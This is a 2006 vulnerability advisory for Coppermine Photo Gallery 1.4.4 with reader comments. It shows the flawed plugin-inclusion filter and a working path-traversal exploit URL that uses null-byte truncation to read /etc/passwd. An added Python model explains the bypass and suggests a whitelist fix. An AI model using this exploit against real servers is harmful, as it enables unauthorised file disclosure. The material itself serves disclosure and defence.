——————-Summary—————-
Software: CPG Coppermine Photo Gallery
Software's Web Site: http://coppermine.sourceforge.net/
Versions: 1.4.4.stable
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: imei addmimistrator
Risk Level: High
—————–Description—————
There is a security flaw in Coppermine Photo Gallery, one of the most popular photo galleries on the internet, that allows an attacker to perform a file inclusion attack.
The bug is in the plugin inclusion system, which does not properly validate the $_GET['file'] parameter and relies on a simple special-character removal mechanism that is easy to evade: it strips '..' and only then '//', so a sequence like './/.' survives the first pass and collapses to '..' in the second, and a trailing %00 (null byte) cuts off the '.php' suffix the code appends.
————–See Also——————
file: index.php, line 39
$file = str_replace('//', '', str_replace('..', '', $_GET['file']));  // '..' is stripped first, then '//': './/.' becomes '..' after the second replace
$path = './plugins/'.$file.'.php';
// Don't include the codebase and credits files
if ($file != 'codebase' && $file != 'configuration' && file_exists($path)) {
    // Include the code from the plugin
    include_once($path);
    $file = true;
}
————–Exploit———————-
/cpg/index.php?file=.//././/././/././/././/././/././/././/././/./etc/passwd%00
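The following Python model is added here as an example; it is not part of this advisory and not Coppermine's code. It reproduces the str_replace chain from index.php line 39 and walks the PoC above through it, showing why the string collapses into a plain ../ traversal, how the %00 byte drops the appended .php suffix, and why the magic_quotes_gpc setting discussed in the comments on this page makes the same request fail. Python's str.replace performs the same single left-to-right pass as PHP's str_replace, so the transformation is exact. The whitelist check at the end is my own suggestion, not the vendor's patch; PLUGIN_DIR, the plugin names and the sample inputs are constructed for illustration.

```python
"""Added example for this advisory (not Coppermine's own code): a Python model
of the filter at index.php line 39 in Coppermine 1.4.4 and of the PoC that
bypasses it.  Python's str.replace performs the same single left-to-right,
non-overlapping pass as PHP's str_replace, so the transformation is exact.
PLUGIN_DIR, the plugin names and the sample inputs are constructed here."""
import re
from typing import Optional
from urllib.parse import unquote

PLUGIN_DIR = "./plugins/"                   # same prefix as the vulnerable code
RESERVED = ("codebase", "configuration")    # names the original code refuses


def coppermine_filter(file_param: str) -> str:
    """The vulnerable sanitiser: strip '..' first, then '//'.
    Because '//' is removed after '..', the string './/.' survives the first
    pass and collapses to '..' in the second one, so traversal gets through."""
    return file_param.replace("..", "").replace("//", "")


def vulnerable_path(file_param: str) -> str:
    """The string the original code hands to file_exists()/include_once()."""
    return PLUGIN_DIR + coppermine_filter(file_param) + ".php"


def path_seen_by_filesystem(path: str) -> str:
    """PHP releases that accept a NUL in a filename (before 5.3.4) pass a
    C string to the OS, which stops at the first NUL, so the '.php' suffix
    appended by the code never reaches open()."""
    nul = path.find("\x00")
    return path if nul < 0 else path[:nul]


def magic_quotes_gpc(decoded: str) -> str:
    """What magic_quotes_gpc=On does to a decoded request value (addslashes):
    backslash, quotes and NUL are escaped; NUL becomes the two characters
    backslash-zero, which is why the truncation trick fails on such hosts."""
    out = decoded.replace("\\", "\\\\")
    return out.replace("\x00", "\\0").replace("'", "\\'").replace('"', '\\"')


SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+")


def hardened_path(file_param: str) -> Optional[str]:
    """One possible fix (my assumption, not the vendor's patch): accept only a
    single path component made of word characters, then apply the original
    reserved-name check.  Anything else is refused outright."""
    if not SAFE_NAME.fullmatch(file_param) or file_param in RESERVED:
        return None
    return PLUGIN_DIR + file_param + ".php"


# The PoC from this advisory, exactly as it appears in the request.
POC = ".//././/././/././/././/././/././/././/././/./etc/passwd%00"


def demo() -> None:
    """Walk the PoC through the decode -> filter -> filesystem chain."""
    decoded = unquote(POC)                    # %00 becomes a real NUL byte
    path = vulnerable_path(decoded)
    print("after filter      :", repr(path))
    print("seen by open()    :", path_seen_by_filesystem(path))
    quoted = vulnerable_path(magic_quotes_gpc(decoded))
    print("with magic_quotes :", path_seen_by_filesystem(quoted))
    print("hardened          :", hardened_path(decoded), hardened_path("my_plugin"))


if __name__ == "__main__":
    demo()
```

Running the file prints the path after the filter (a run of ../ segments ending in etc/passwd followed by a NUL and .php), the truncated path the filesystem actually opens, the backslash-zero version that magic_quotes_gpc produces (which no longer truncates, so file_exists() fails), and the whitelist result. Note that a straightforward ../../etc/passwd is correctly neutralised by the filter; only the interleaved .//./ form gets through.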
————–Credit———————–
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
imei(4}Kapda(O}IR
www.myimei.com
myimei.com/security
I can't exploit this vulnerability... I tried 5 sites... adding and removing /././ in the path
doesn't work (((
Left by nothing on April 17th, 2006
Copy the PoC correctly and read the style of the bypass :p
Left by Psymera on April 17th, 2006
Friends; I have some reports that if, on a host, the GPC (get post cookie) option (magic_quotes_gpc = off) was ON (maybe), the null injection of the exploit will fail and the entered string will equal .//././/./[&also]./etc/passwd\0.php
You'll see that this way the exploit will not work properly because the if(file_exists) section will never be true!
Another notice!
This site is not a source for distributing exploits. It is for announcing bugs to vendors and advancing a more secure software world.
So asking questions such as "How can I hack via this, and how does that work, or I can't use it, help me please" is not in keeping with the goal of the site. Let's help vendors, not annoy them and their users!
Sincerely,
imei addmimistrator
Left by imei on April 18th, 2006
http://www.securityfocus.com/bid/17570
Left by imei on April 18th, 2006
It seems like this doesn't affect Coppermine galleries running on OpenBSD.. (or maybe because I use their default php.ini.. which is said to be safe?). Anyway, I can't seem to exploit it on my server.. which is good.. but doing it on a Linux server.. this does seem to work.
Not that you can actually do a lot... but it's something that the guys at Coppermine are working on.. thankfully.
Left by Ryan on April 20th, 2006
Yes.. it seems like setting magic_quotes_gpc = on will fix this.. be it temporarily, until Coppermine release a fix.
Left by Ryan on April 20th, 2006
example
It is just an example! This bug works!
(example provided by: akram142{4]hotmail(o)com)
Left by imei on April 20th, 2006